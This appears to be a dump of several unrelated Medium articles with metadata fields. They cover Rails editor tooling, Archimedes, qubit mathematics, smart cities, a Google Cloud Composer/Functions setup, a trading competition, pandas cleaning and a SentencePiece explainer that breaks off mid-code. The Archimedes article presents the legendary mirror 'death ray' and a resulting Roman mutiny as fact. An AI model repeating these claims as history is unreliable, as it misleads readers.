Code formatter for writing Ruby.
If you’re running into the following error, follow this guide to link the right execution path:
rubocop is not excutable
execute path is empty!
Not being able to indent your html.erb files in VS Code can be a real pain. ERB Formatter depends on the htmlbeautifier gem, so we need to install that dependency too.
gem install htmlbeautifier
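A note for item 8 below (Emmet in ERB): Emmet abbreviations don’t expand in .erb files out of the box. A commonly used tweak, assuming VS Code’s standard emmet.includeLanguages setting, is to map ERB to HTML in settings.json:

```jsonc
{
  // Treat ERB templates as HTML so Emmet abbreviations expand inside them.
  "emmet.includeLanguages": {
    "erb": "html"
  }
}
```

After reloading the editor, typing an abbreviation such as div.container inside an .html.erb file should expand as it does in plain HTML.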
8. Emmet in ERB | https://medium.com/better-programming/vs-code-extensions-for-ruby-on-rails-developers-917474e03e04 | ['Thomas Van Holder'] | 2020-09-09 15:28:14.456000+00:00 | ['Vscode', 'Ruby on Rails', 'Software Development', 'Ruby', 'Programming'] |
The Brilliant Scientist Who Stopped the Roman Army | The story of Archimedes
Archimedes was a resident of the city-state of Syracuse on the east coast of Sicily, founded in 734 BCE. During his time the state was a powerhouse of art, science, and commerce, even rivaling Athens.
Archimedes shared a close relationship with the king and was often called to suggest solutions to civic problems within the city. From inventing a water pump to remove rainwater from ships to testing the amount of gold in the king’s crown (remember the Eureka moment when he ran naked?), Archimedes’s brilliance made him the most respected scientist of his time.
It was around this time that the Romans attacked the state. A huge Roman army under their famous general Marcellus laid siege outside the walls of Syracuse. Well versed in siege warfare, the Romans expected the conquering of the city-state to be a cakewalk as ships carrying ladders and grappling hooks sailed toward the city with the intention of scaling its walls.
But they had grossly underestimated the brilliance of Archimedes. Archimedes devised a series of devious engineering marvels that repulsed Marcellus and his army in every assault. What was expected to finish in two days went on for two years, with the Roman army waiting outside the walls, frustrated and terrorized by a ‘local’ engineer, as they called Archimedes.
Some of his marvelous creations were simply too brilliant even for today’s times.
The Archimedes Claw
The Archimedes Claw was a notorious invention in which huge beams could be swung out over the walls; some dropped huge weights, punching holes through the ships and sinking them.
Others had a claw or grappling hook, which grabbed hold of the rigging or rails of a galley, raising it, shaking it, and capsizing it. The terrifying spectacle of a ship being lifted and thrown struck terror into the Romans.
The Archimedes Catapult Engine
The historian Plutarch describes the catapult engine as a series of “engines” designed to hurl arrows and rocks at attacking Roman troops and ships.
According to him, some of the rocks hurled from Archimedes’s catapults weighed as much as 10 talents — around 700 pounds. He also describes different types of catapult engines with varied ability to hurl or shoot projectiles at attackers both at great range and directly under the city’s walls.
The Archimedes Death Ray
This was the most lethal of Archimedes inventions. The invention involved a huge mirror that could focus sunlight onto the wooden Roman ships and cause them to burst into flames.
The device consisted of a large array of highly polished bronze or copper shields arranged in a parabola, concentrating sunlight into a single, intense beam. This single device wreaked havoc among the Roman sailors, who even mutinied rather than risk being burnt to death.
Marcellus could not afford any more direct attacks and he suffered heavy losses. What began as a short siege had become a stalemate that went on for two years. | https://medium.com/lessons-from-history/the-brilliant-scientist-who-stopped-the-roman-army-f85f295063c3 | ['Mythili The Dreamer'] | 2020-11-06 19:35:45.848000+00:00 | ['World', 'Culture', 'Technology', 'Science', 'History'] |
Collapsing the Superposition: The Mathematics of Quantum Computing | We think of bits as 1’s and 0’s. Really, bits could be anything with 2 states: true/false; on/off; heads/tails. A classical computer simply quantifies these bits as integers since that’s all a computer can store and process. Qubits, however, are an entirely different beast: they’re vectors. This is because a qubit really represents the probability that its bitstate is either 0 or 1; rather than only being 0 or 1, they can exist as any value between 0 and 1 until they are measured (we’ll touch on this in a bit).
In quantum mechanics, we represent vectors using Dirac notation, which makes quantum computations clearer and more concise. |ψ⟩ denotes a unit column vector and ⟨ψ| denotes a corresponding row vector. ⟨ψ| is the Hermitian transpose of |ψ⟩, which is found by transposing |ψ⟩ and taking the complex conjugate of every entry, represented as ψ†. We represent the classical bits 0 and 1 as column vectors |0⟩ and |1⟩:
Notice how the 1 is in the 0th position for |0⟩ and in the 1st position for |1⟩
Why are qubits vectors? In quantum mechanics, the properties of an electron, more precisely its spin, are unknown until we actually measure its state. Similarly, in quantum computing, the state of a qubit exists as a superposition of all possible states, with an assigned probability of it being 0 or 1; until the qubit is measured (see below), it is both 0 and 1, but with a certain likelihood of collapsing to 0 versus 1. A qubit in a state of superposition is a linear combination of the infinite states that exist between 0 and 1. This can be visualized on a Bloch sphere.
The Bloch sphere enables us to visualize the qubit, which is a 2-dimensional complex vector, as a 3-dimensional real-valued vector.
So, when we perform specific operations upon a qubit, we can force it into a superposition, where it is no longer only 0 or only 1; rather, it exists as a certain probability of both. These operations can be thought of as rotating the unit vector around the Bloch sphere in a 3-dimensional real vector space. A vector space is simply the space in which a vector resides. A simple 2-dimensional vector lies in the vector space ℝ².
When a qubit is actually measured, it will always be either 0 or 1. The act of measuring the qubit has caused the quantum superposition to collapse, and the qubit’s state is now analogous to classical bits’. Informally, we can consider measuring a qubit as ‘observing’ it. Once a qubit’s superposition has been collapsed, it will remain in that state indefinitely. The value it collapses to depends upon its configuration, which is known as its quantum interference. A qubit can be restored to a superposition state via a quantum gate, which performs an operation upon one or more qubits.
More generally, a qubit’s state can be represented as |ψ⟩ = α|0⟩ + β|1⟩, where α and β are complex numbers (numbers of the form a + bi) whose squared magnitudes give the respective probabilities that the qubit will collapse to 0 or to 1. These coefficients satisfy the equation |α|² + |β|² = 1, as the sum of all probabilities in a system must be 1. Thus, if the qubit has a 50% chance of collapsing to 0 and a 50% chance of collapsing to 1, α = 1/√2 and β = 1/√2.
As seen in the Bloch sphere, |0⟩ and |1⟩ form the basis vectors of the vector space that describes the qubit’s state. α and β can thus be seen as the rotations applied to a vector in a complex vector space. We often arrange α and β in a column vector known as a quantum state vector, as shown below:
A single qubit isn’t of much practical use; a modern calculator easily outperforms it. The true power of quantum computing comes from using and manipulating many qubits. The joint state of multiple qubits is written as a tensor product. If we let α|0⟩ + β|1⟩ and γ|0⟩ + δ|1⟩ be two qubits’ states, then we can represent their system’s state as follows:
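As a rough numerical sketch (plain Python with amplitudes stored in lists, no quantum library assumed), the normalization condition and the two-qubit tensor product work out like this:

```python
import math

# Basis states |0> and |1> as two-entry vectors.
ket0 = [1.0, 0.0]
ket1 = [0.0, 1.0]

# Equal superposition: alpha = beta = 1/sqrt(2).
alpha = beta = 1 / math.sqrt(2)
psi = [alpha * a + beta * b for a, b in zip(ket0, ket1)]

# The amplitudes must satisfy |alpha|^2 + |beta|^2 = 1.
norm = abs(alpha) ** 2 + abs(beta) ** 2
print(round(norm, 10))  # 1.0

def tensor(u, v):
    # Kronecker (tensor) product: amplitudes of the combined system,
    # ordered |00>, |01>, |10>, |11>.
    return [a * b for a in u for b in v]

two_qubit = tensor(psi, psi)
print(len(two_qubit))  # 4 -> two qubits span 2^2 basis states
```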
What every element of this column vector represents is the probability that the quantum system will collapse to a value of 0, 1, 2, or 3. In general, if we have n qubits we can represent 2ⁿ states (values 0 through 2ⁿ-1). While we can always take the tensor product of 2 single-qubit states, not all two-qubit states can be denoted as a tensor product. In fact, such a system is said to be entangled. | https://medium.com/datadriveninvestor/collapsing-the-superposition-the-mathematics-of-quantum-computing-6c4679c6cf99 | ['Kaushik Chatterjee'] | 2020-10-31 08:00:16.012000+00:00 | ['Quantum Physics', 'Mathematics', 'Technology', 'Linear Algebra', 'Quantum Computing']
Building Smart Cities from Big Data | Building Smart Cities from Big Data
Since the introduction of smartphones, the term “smart” has been added in front of just about anything that connects to the internet, from smart home appliances to smart cars, and now smart cities.
Despite hearing this term for a decade now, many of us are still confused about what it really means.
The core element that constitutes “smart” is not an internet connection, but data sharing and analysis. A smart device goes beyond generating and collecting data; it also shares that data and analyzes it into useful information. Such information is then used to maximize efficiency and eliminate deficiencies.
For example, a smart speaker utilizes a massive database of speech patterns and learns those patterns in order to provide the optimal response to the user’s request. A smart car utilizes a database of traffic patterns and combines them with real-time transportation data to provide a smooth transportation experience.
What are smart cities?
Just like other smart things, a smart city can be seen as a giant smart device that shares data through information and communication technologies (ICTs) and analyzes them to gain useful insights. In more specific terms, a smart city collects data through various Internet of Things (IoT) sensors and uses these data to generate useful information to optimize the functioning of the city.
Simply put, the two ultimate goals for a smart city are to drive sustainability by saving resources and to improve livability by optimizing city functions.
How to build a smart city?
Governments of major metropolitan centers across the globe have started their own initiatives towards building a smart city. Smart city projects have already been implemented in cities like Madrid, Amsterdam, Dubai, Singapore, Seoul, and New York.
In South Korea, a market where Penta Security is highly involved in, smart city programs have started to take off. Its capital city Seoul is planning and implementing some of the most ambitious smart city projects. Last year, the metropolitan government of Seoul announced its plan to invest a total of 1.4 trillion won, or roughly 1.15 billion US dollars, on smart city projects.
In order to better understand how a smart city is built, let’s take a look at what Seoul has been working on.
Smart environment
Seoul is currently installing 50,000 IoT sensors within the city to collect environmental data including air and noise pollution, UV rays, and population density. Residents can look for this information in real-time to plan their daily activities. The city also collects data on road surface temperature to determine where to install heating cables.
Smart services
Before building new public services, the government analyzes population data to gain insights on where a service is most needed so that every service can be built with the optimal capacity at the optimal location. This is especially useful for building welfare infrastructures such as public health facilities and daycare centers.
During the development process, the city also utilizes 3D simulation to see how new facilities fit with the surrounding community, ensuring they are both practical and aesthetically pleasing.
Smart mobility
We cannot talk about smart mobility without mentioning autonomous driving. Seoul has completed the world’s first 5G autonomous driving testbed at Digital Media City, preparing itself for a fully connected mobility environment.
The city has also built a shared parking lot system equipped with IoT sensors. Residents can use a mobile app to gain real-time information on parking space availability, make reservations, and make payments. More than 500 public parking lots are currently enrolled, with the number expected to reach 3,000 by 2022.
In terms of public transportation, the city has rolled out a series of night-time bus routes. During the planning process, data of three billion mobile phone calls with their time and location were analyzed in order to identify the locations with the highest demand. Currently used by 10,000 people daily, the new routes turned out to be highly efficient.
Smart policing
Intelligent surveillance cameras are used in public spaces, automatically analyzing real-time footage to detect abnormal activities such as fights, arson attacks, and traffic accidents. Street lights are equipped with sensors that automatically light up when pedestrians pass by so that no dark spot is left open at night, saving energy while enhancing safety.
Smart healthcare
Seoul is also actively involved in the healthcare industry to provide smart care services for seniors. It is currently working with public healthcare facilities to securely retrieve medical data, which it uses to identify physically vulnerable individuals. It will then help ensure the safety of these individuals by monitoring their electricity and water usage in real-time. If no change in usage is detected, an alarm will be sent immediately to a social worker in charge. This service has already been implemented for 1,000 vulnerable households and is expected to reach 4,000 households by 2022.
Security infrastructure for smart cities
Building a smart city based on big data comes with its security risks. Integrating every IoT element into one massive network means that many critical functions of the city would be bound together, which also means that cyberattackers have more entry points to choose from.
Without proper security measures, smart cities can quickly turn into chaos. As we have always emphasized, the more we rely on technology and automation, the more blurry the boundary between the real world and the cyberworld. In the case of smart cities, cybersecurity is directly tied to physical safety. Criminals could attack major infrastructures to disrupt service, and take advantage of such disruptions to conduct illegal activities. Service disruptions on public transportation, electricity, and healthcare pose a significant threat to our economy and society. We have seen recent cyberattacks on healthcare providers, some of them causing critical surgeries to be delayed (ZDNet). Another severe case would be an attack on autonomous vehicles, which indeed has life-threatening consequences.
Apart from safety, privacy is another concern. A smart city shares tons of data with millions of devices. Some of these data could contain personally identifiable information, which must be encrypted and secured with blockchain technology. Surveillance footage is also concerning for many who worry about exposing their daily activities.
Penta Security’s role in building smart cities
With abundant experience in designing public key infrastructures (PKIs) for governments as well as security solutions for financial institutions, Penta Security is actively involved as a security infrastructure provider for smart cities. Working with government ministries and infrastructure providers, Penta Security has been playing a key role in securing a wide range of smart infrastructure projects in the fields of mobility, transportation, energy, and environment.
As these smart infrastructures become increasingly connected, forming a massive network, Penta Security is currently focusing on developing an integrated solution for smart cities.
Source: Seoul Metropolitan Government
Check out Penta Security’s product lines:
Web Application Firewall: WAPPLES
Web Application Firewall for Cloud: WAPPLES SA
Database Encryption: D’Amo
Authentication: ISign+
Smart Car Security: AutoCrypt | https://medium.com/penta-security-systems/building-smart-cities-from-big-data-f34942fac5d4 | ['Rachel Yoon'] | 2020-04-23 05:37:53.027000+00:00 | ['Smart City Solutions', 'Infrastructure', 'Smart City', 'Big Data Analytics', 'Big Data'] |
Calling Cloud Composer to Cloud Functions and back again, securely | Sample Cloud Composer (Apache Airflow) configuration to securely invoke Cloud Functions or Cloud Run.
In addition, this sample shows the inverse: how Cloud Functions can invoke a Composer DAG securely. While GCF->Composer is documented here, the configuration detailed here is minimal and (to me) easier to read.
Setup
1. Create Composer Environment
export GOOGLE_PROJECT_ID=`gcloud config get-value core/project`
export PROJECT_NUMBER=`gcloud projects describe $GOOGLE_PROJECT_ID --format='value(projectNumber)'`
gcloud composer environments create composer1 --location us-central1
gcloud composer environments list --locations us-central1
┌───────────┬─────────────┬─────────┬──────────────────────────┐
│ NAME │ LOCATION │ STATE │ CREATE_TIME │
├───────────┼─────────────┼─────────┼──────────────────────────┤
│ composer1 │ us-central1 │ RUNNING │ 2019-05-21T20:35:21.960Z │
└───────────┴─────────────┴─────────┴──────────────────────────┘
2. Add Python Packages and GCF Connection URL
The following steps set up the Airflow connections we will use internally. The commands below configure a URL pointing to a GCF function we will enable later.
Configure requirements.txt
gcloud composer environments update composer1 \
--update-pypi-packages-from-file requirements.txt --location us-central1
Configure connection
gcloud composer environments update composer1 \
--update-env-variables=AIRFLOW_CONN_MY_GCF_CONN=https://us-central1-$GOOGLE_PROJECT_ID.cloudfunctions.net --location us-central1
Note: each of these commands takes ~10mins; go grab a coffee.
Verify the configurations via the CLI and on the Cloud Console for Composer
gcloud composer environments describe composer1 --location us-central1
The following will list the default GCS bucket used for its configurations and DAG storage
gcloud composer environments describe composer1 --location us-central1 --format="get(config.dagGcsPrefix)"
You can now open up the Airflow GUI
and also see the GCP Console:
Config:
Env
Python Packages
3. Identify the client_id used by IAP
Cloud Composer is shielded by Cloud Identity-Aware Proxy. The following command will identify the OAuth2 client_id it uses, which we will later need to trigger DAGs externally from GCF. For reference, see triggering with GCF
Get the Airflow URL:
If you are an Editor on the project running Airflow, you should have Editor rights to invoke the endpoint:
(the following command uses the jq CLI to parse JSON)
$ curl -s -H "Authorization: Bearer `gcloud auth print-access-token`" https://composer.googleapis.com/v1beta1/projects/$GOOGLE_PROJECT_ID/locations/us-central1/environments/composer1 | jq [.config.airflowUri]
In my case, the URL for Airflow is:
[
"https://r1d366b885bb81b73-tp.appspot.com"
]
Use the URL to extract the client ID
Attempt to make an unauthenticated call to the URL. You should see an error but within the curl output you will find the elusive client_id :
eg, in my case the command above showed
which means the client_id is 491562778408-sj8hb4035bp7ui918ra0i9qbhbqnejk1.apps.googleusercontent.com
Note the client_id and composer_url:
target_audience = `491562778408-sj8hb4035bp7ui918ra0i9qbhbqnejk1.apps.googleusercontent.com`
url = `https://r1d366b885bb81b73-tp.appspot.com`
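If you'd rather extract the client_id programmatically than eyeball the curl output, the OAuth2 redirect URL can be parsed with the Python standard library. This is a sketch: the redirect URL below is just the example value from above, and a real IAP redirect carries additional query parameters.

```python
from urllib.parse import urlparse, parse_qs

def extract_client_id(redirect_url: str) -> str:
    """Pull the client_id query parameter out of an IAP OAuth2 redirect URL."""
    params = parse_qs(urlparse(redirect_url).query)
    return params["client_id"][0]

# Hypothetical redirect URL of the kind IAP returns for an unauthenticated request
redirect = (
    "https://accounts.google.com/o/oauth2/v2/auth"
    "?client_id=491562778408-sj8hb4035bp7ui918ra0i9qbhbqnejk1.apps.googleusercontent.com"
    "&response_type=code"
)
print(extract_client_id(redirect))
```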
4. Deploy DAGs
Deploy the DAG that sends authenticated calls to GCF:
Edit to_gcf.py and replace the following line with your projectID
target_audience = 'https://us-central1-$GOOGLE_PROJECT_ID.cloudfunctions.net/echo_app_python'
then
gcloud composer environments storage dags import \
--environment composer1 --location us-central1 \
--source to_gcf.py
Deploy the DAG that receives authenticated calls from GCF:
gcloud composer environments storage dags import \
--environment composer1 --location us-central1 \
--source from_gcf.py
5. Deploy GCF
Edit main.py and update target_url and url with the values from step 3:
in my case:
target_audience = '491562778408-sj8hb4035bp7ui918ra0i9qbhbqnejk1.apps.googleusercontent.com'
url = 'https://r1d366b885bb81b73-tp.appspot.com'
then deploy
gcloud functions deploy echo_app_python --region=us-central1
6. Set IAM Permissions
Now set IAM permissions to
Allow Composer to call GCF
When we set up Composer, we did not specify the service account it should run as. By default, it will use the Compute Engine default service account, which is in the form:
$PROJECT_NUMBER-compute@developer.gserviceaccount.com
then apply:
gcloud alpha functions add-iam-policy-binding echo_app_python \
--member serviceAccount:$PROJECT_NUMBER-compute@developer.gserviceaccount.com \
--role roles/cloudfunctions.invoker
Allow GCF to call Composer
During our setup of Cloud Functions, we did not specify a service account. By default GCF will use an account in the form:
$GOOGLE_PROJECT_ID@appspot.gserviceaccount.com
so using that, go to the Cloud Console's IAM page and, for that account, add the Composer User IAM role
GCF invokes a DAG directly using the Experimental Rest Endpoint
7. Invoke DAG directly
The default callgcf DAG is set to run every 30 minutes. However, you can invoke it directly if you want, via the UI or CLI:
On the console, you should see invocation back and forth:
callgcf :
fromgcf :
References | https://medium.com/google-cloud/calling-cloud-composer-to-cloud-functions-and-back-again-securely-8e65d783acce | ['Salmaan Rashid'] | 2020-01-01 16:25:57.842000+00:00 | ['Airflow', 'Google Cloud Platform'] |
CVI Beta Platform Competition — The Results! | On December 30th we launched the beta version of the CVI trading platform. In order to encourage users to test the platform before it goes live on MainNet and to educate our community on Volatility Trading, we performed an incentivized trading competition on the CVI platform.
The competition started on December 30th, 2020, at 4 pm UTC and ended on January 17th, 2021, at 8 am UTC. At this time exactly, we ran the snapshot of all participants’ P&L (profits and losses).
This competition was a great success and allowed 1700 users to familiarize themselves with the platform. These users participated and competed to get a share of the reward pool of 150K $GOVI. Not only were they awarded for their participation, but it also allowed us to have valuable insights and form new, interesting ideas. Some of them will be implemented in the MainNet version, and for that, we’d like to thank all the participants who took part in this beta testing.
Here are some key insights into what happened on the platform during the entire duration of the competition:
Participation
More than 1700 users participated in the competition and tested the system.
15,160,621$ test USDT were locked into the platform of which: 6,915,572$ were deposited in liquidity and 8,245,048$ were the current trading positions.
During the competition time, the CVI rose to an all-time high of 156.5.
Stats
Buyers of CVI (LONG CVI):
1296 users of the platform have chosen to buy positions, expecting more market volatility.
The buyers’ positions size was: 8.24M USDT
As it turns out, those users were correct in their predictions, some making a profit of over 78% during the 17 days of the competition.
The collateral ratio, which is the ratio between the amount of all the buyers’ positions and the total liquidity available, was at 72.6% on January 17th. This is just below the threshold, so the buying premium fee was zero.
Depositing Liquidity (SHORT CVI): | https://medium.com/@cviofficial/cvi-beta-platform-competition-the-results-ceedd2d1deb3 | [] | 2021-01-18 14:50:29.334000+00:00 | ['Competition', 'Blockchain', 'Cryptocurrency', 'Trading'] |
Your Ultimate Data Manipulation & Cleaning Cheat Sheet | X-Variable Cleaning Methods
Applying a function to a column is often needed to clean it. In the case where cleaning cannot be done by a built-in function, you may need to write your own function or pass in an external built-in function. For example, say that all values of column b below 2 are invalid. A function to be applied can then act as a filter, returning NaN values for column elements that fail to pass the filter:
import numpy as np

def filter_b(value):
    # values of column b below 2 are invalid
    if value < 2:
        return np.nan
    else:
        return value
A new cleaned column, ‘cleaned_b’, can then be created by applying the filter using pandas’ .apply() function:
data['cleaned_b'] = data['b'].apply(filter_b)
Another common use case is converting data types. For instance, converting a string column into a numerical column could be done with data[‘target’].apply(float) using the Python built-in function float .
Removing duplicates is a common task in data cleaning. This can be done with data.drop_duplicates() , which removes rows that have the exact same values. Be cautious when using this — when the number of features is small, duplicate rows may not be errors in data collection. However, with large datasets and mostly continuous variables, the chance that duplicates are not errors is small.
Sampling data points is common when a dataset is too large (or for another purpose) and data points need to be randomly sampled. This can be done with data.sample(number_of_samples) .
Renaming columns is done with .rename , where the parameter passed is a dictionary where the key is the original column name and the value is the renamed value. For example, data.rename({‘a’:1, ‘b’:3}) would rename the column ‘a’ to 1 and the column ‘b’ to 3.
Replacing values within the data can be done with data.replace() , which takes in two parameters to_replace and value , which represent values within the DataFrame that will be replaced by other values. This is helpful for the next section, imputing missing values, which can replace certain variables with np.nan so imputing algorithms can recognize them.
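To tie a few of these together, here is a minimal sketch (the sentinel value -999 and the toy frame are made up for illustration) showing replace feeding missing-value handling, followed by drop_duplicates :

```python
import numpy as np
import pandas as pd

# Toy frame with a sentinel value (-999) and one exact duplicate row
data = pd.DataFrame({"a": [1, 2, 2, -999], "b": ["x", "y", "y", "z"]})

# Mark sentinel values as missing so imputing algorithms can recognize them
data = data.replace(to_replace=-999, value=np.nan)

# Remove rows that have the exact same values
data = data.drop_duplicates()

print(len(data))               # the duplicate row is gone -> 3 rows
print(data["a"].isna().sum())  # one missing value ready for imputation
```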
More handy pandas functions specifically for data manipulation can be found here: | https://towardsdatascience.com/your-ultimate-data-manipulation-cleaning-cheat-sheet-731f3b14a0be | ['Andre Ye'] | 2020-07-04 16:55:44.812000+00:00 | ['Machine Learning', 'Data Analysis', 'AI', 'Data Science', 'Statistics'] |
Today I went to this tea shop after a long time. | Today I went to this tea shop after a long time. Everything was the same as before except for two things (bolded below).
I walked towards the tea shop. I reached there, he recognized me and smiled. I too smiled. I ordered the tea. He served the tea, but this time in a paper cup.
Before he used to serve tea on a glass cup, but now due to covid spread he is serving tea in a disposable paper cup.
I took the paper cup filled with tea and immediately began to sip it, only to recognize that this time I got a mask on my face, covering my mouth, which I had to take off before I make fun of myself.
I sat there and finished the tea, paid the money, and came back walking. Is it not good enough? | https://medium.com/everything-shortform/today-i-went-to-this-tea-shop-after-a-long-time-d305e35136d | ['Pretheesh Presannan'] | 2020-12-17 05:05:40.822000+00:00 | ['Fun', 'Short Read', 'Pandemic', 'Tea', 'Masks'] |
SentencePiece Tokenizer Demystified | SentencePiece Tokenizer Demystified
An in-depth dive into the inner workings of the SentencePiece tokenizer, why it's so powerful, and why it should be your go-to tokenizer. You might just start caring about tokenization.
Jonathan Kernes · Feb 4
Photo by Cristian Escobar on Unsplash
I’ll be the first to admit that learning about tokenization schemes can be boring, if not downright painful. Often, when training a natural language, choosing and implementing a tokenization scheme is just one more added layer of complexity. It can complicate your production pipelines, kill the mood with a poorly timed [OOV] or [UNK], or maybe just send you into the depths of unicode hell, where you wonder why “string” != “string”.
However, like your first truly good glass of wine, or your first experience with high quality sushi, once you’ve had a taste of the good stuff, you’ll see the rest in a totally different light. This post is meant to discuss SentencePiece, and show how painless it makes the tokenization process. Along the way you might just decide that tokenization isn’t so bad after all.
What is SentencePiece?
Surprisingly, it’s not actually a tokenizer, I know, misleading. It’s actually a method for selecting tokens from a precompiled list, optimizing the tokenization process based on a supplied corpus. SentencePiece [1], is the name for a package (available here [2]) which implements the Subword Regularization algorithm [3] (all by the same author, Kudo, Taku). For the duration of the post, I will continue to use SentencePiece to refer to both the algorithm and its package, as that will hopefully be less confusing.
If you want instructions on how to use the actual software, take a look at the colab link at the end of the article or in Reference [18].
Strengths of SentencePiece
It’s implemented in C++ and blazingly fast. You can train a tokenizer on a corpus of 10⁵ characters in seconds. It’s also blazingly fast to tokenize. This means you can use it directly on raw text data, without the need to store your tokenized data to disk. Subword regularization is like a text version of data augmentation, and can greatly improve the quality of your model. It’s whitespace agnostic. You can train non-whitespace delineated languages like Chinese and Japanese with the same ease as you would English or French. It can work at the byte level, so you **almost** never need to use [UNK] or [OOV] tokens. This is not specific only to SentencePiece. This paper [17]: Byte Pair Encoding is Suboptimal for Language Model Pretraining — https://arxiv.org/pdf/2004.03720.pdf
SentencePiece is powerful, but what exactly is its purpose? Alluding to point (3), it enables us to train the subword regularization task, which we now explain.
The Subword Regularization objective
Our goal in this subsection is to explicitly develop the learning objective for subword regularization. To begin, let’s consider how we might assign probabilities to sequences. In general, we like to think of sequences as containing a direction, meaning there is a forward and backward direction. You speak words in an order. Stocks rise and fall over time. We can thus specify the distribution of a sequence in terms of its conditional distributions at earlier times. Given a sequence of unigrams X = (x_1, … , x_n), from repeated application of Bayes’ rule we rewrite its probability as
P(X) = p(x_1) p(x_2 | x_1) p(x_3 | x_2, x_1) ⋯ p(x_n | x_{n−1}, …, x_1)
Readers familiar with the Naive Bayes method [5] should recognize this formula. In Naive Bayes, we make a conditional independence assumption (a strong assumption) that if X is conditioned on some variable y, i.e. P(X|y), then we can assume that p(x_2|x_1, y) = p(x_2 | y), p(x_3|x_2, x_1, y) = p(x_3|y) and so on. Meaning if we are given information about this other thing y, we can totally forget about all the variables x_{j<i} that x_i depends on.
To prep ourselves for such a simplification, we consider the problem of Nerual Machine Translation (NMT). There, we want to assess the probability P(Y|X) of a target sentence Y given an input sentence X. As both Y and X are sequences, we can write the probability [3]
P(Y | X; θ) = ∏_{n=1}^{N} P(y_n | X, y_1, …, y_{n−1}; θ)
Here, the lower case variables indicate the actual tokens, and the uppercase the sequence of such tokens. Theta represents our model parameters (the weights of a neural network). As it stands, this formula is not quite correct. In reality, X and Y can be formed by an exponentially large number of possible subword sequences. Think breaking down the word “hello”. We could tokenize in a large number of ways:
Even a simple word like “hello” can exhibit an exponential number of possible tokenizations
So in reality, we should replace X and Y on the left with a specific sequence representation x and y. SentencePiece acknowledges this reality, and uses it to its advantage. We can then write the full segmentation-averaged cost function for our NMT task as
L(θ) = Σ_{s=1}^{|D|} E_{x ∼ P(x | X^{(s)}), y ∼ P(y | Y^{(s)})} [ log P(y | x; θ) ]
Here, |D| is the number of sentence pairs in the corpus; for each pair, x and y are drawn from their respective distributions over possible segmentations. L is the cost function and P is as before.
This formula is slightly intimidating, but you don’t need to think too hard about it. What we can do in practice, is remove the expectation E[…] and just replace x and y with a single randomized segmentation. That’s it. Everything else we would normally do for training an NMT model is unchanged (this includes a short length penalty and any other model hacks).
The “use one sample” approximation should be familiar to anyone who has worked with Variational Autoencoders [6], where the expectation value over hidden states is similarly approximated by a sample size of one.
Now that we’ve defined the training task, we have to answer the practical question; yeah cool, but how in the world do we build a probability distribution over an exponential number of states?! Like everything else in science, we cheat and approximate like hell until someone tells us we can’t.
Unigram language models
At its heart, SentencePiece is just another plain old unigram model. What this means is that it's too hard to consider even a joint distribution P(x_1, x_2) of just two tokens, let alone the n needed to specify P(X). So, we just make the approximation:

P(x) = p(x_1) p(x_2) ⋯ p(x_n)
subject to the normalization constraint:

Σ_{x ∈ V} p(x) = 1 (with V the subword vocabulary),
where every subword (known as a unigram here) occurs with probability independent of every other subword. Yes, a drastic assumption, but empirically not too harmful.
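Under this factorization, scoring a candidate segmentation is just a sum of log-probabilities. A quick sketch (the probabilities below are made up, not from a trained model):

```python
import math

# Hypothetical unigram probabilities for a few subwords
unigram_p = {"he": 0.2, "ll": 0.1, "o": 0.3}

def sequence_log_prob(tokens, p):
    """log P(x) = sum_i log p(x_i) under the unigram independence assumption."""
    return sum(math.log(p[t]) for t in tokens)

lp = sequence_log_prob(["he", "ll", "o"], unigram_p)
```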
Unigram language models are quite common, and have been around for a while. A popular method called Byte Pair Encoding (BPE), first introduced in the information literature by Gage [7] and later used in the context of NMT by Sennrich et. al. [8] (a very readable paper btw) is a simple method generating based on encoding the text with the fewest required bits of information. A slight variant of BPE called WordPiece is another popular tokenizer, and we refer the reader to other digestible summary articles like [9] for a better overview.
In principle, SentencePiece can be built on any unigram model. The only things we need to feed it are
The unigram probabilities The training corpus
We then just train the SentencePiece tokenizer on the corpus, and we are free to perform the subword regularized (or not) NMT training. The beauty is we don’t even need to use subword regularization if we don’t want to. We could also just use SentencePiece as a fast tokenizer that let’s us handle raw text on the fly.
Despite making the drastic unigram assumption, how to train the tokenizer is not at all obvious, and one of the reasons for this post. We explain this in detail after the next section.
In order to actually do something concrete though, eventually we have to pick a unigram model. In this post, we will use BPE, as it’s straightforward and simple enough that we can make a homecooked version on the spot.
Byte Pair Encoding
The general idea is to do the following:
1. Go through your corpus and find all the "bytes," i.e. the irreducible characters from which all others can be built. This is our base. It ensures we can almost always reconstruct any unseen input.
2. Run a sliding window over the entire corpus (the actual code is slightly different) and find the most frequent bigram. Bigrams are formed from consecutive subwords in the current list of seen subwords. So, "hello" would have the counts {"he": 1, "el": 1, "ll": 1, "lo": 1}.
3. Choose the most frequent bigram, add it to the list of subwords, then merge all instances of this bigram in the corpus.
4. Repeat until you reach your desired vocabulary size.
By always picking the most frequent bigram (i.e. byte-pair) we in essence minimizing the coding length needed to encode our corpus, hence the whole “minimizing information” thing.
In practice, it’s not efficient to loop over the entire corpus every time we want to find a new byte-pair. Instead, we loop once at the start to find all words (not subwords, actual words) and create vocabulary, which is a dictionary matching words to their word count. We then only need to loop over words in the dictionary each time, and if a word appears 20 times, then any of its subwords will also appear at least 20 times.
BPE is an incremental and deterministic method. We can always tokenize by following the same order of merges. I want to pause and emphasize the importance of this point. If we don’t follow the same order, all hell breaks loose. In BPE we first preprocess words to be space separated, with a special </w> token to indicate a word break. Consider the word
Boat → B o a t </w>
Suppose our corpus talks alot about snakes (boa constrictors), breakfast and sailing, so we might see the words “boa”, “oat”, and “boat”. If we talk more about snakes than breakfast, we might get the tokenization
(For snake enthusiasts) Boat → Boa t </w>
(For breakfast enthusiasts) Boat → B oat </w>
If we never talk about boats, then the tokenizers will never line up. One will have a Boa where the other has an Oat and they won’t agree.
With that digression out of the way, let’s dive right into the BPE code, since it’s not our main focus, and it’s actually semi-written out in the original paper [8]
The standard BPE format is how we wrote Boat above. Subwords separated by spaces, with an end of word token </w>. We choose the token “_” instead of </w> to align better with SentencePiece.
First, in the `initialize_vocab` method, we initialize the vocabulary by getting all the words and their counts, then initialize the tokens by finding all irreducible characters.
The get_bigrams method is auxiliary method to determine the most frequent bigram. The merge vocab takes care of updating the vocab to use the new bigram, and returns the bigram → bytepair merge, so that we can store the operation in a list.
Finally, the find_merges function does the work of actually finding bigrams, and the fit function just coordinates all of the helper methods.
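A compact sketch of such a trainer, with methods named after the description above (the bigram-counting and merging details here are one reasonable implementation and may differ from the original gist; we use "_" as the end-of-word token as noted earlier):

```python
import re
from collections import Counter

class BPE:
    """Minimal byte-pair encoder sketch. Each vocab key is a word written as
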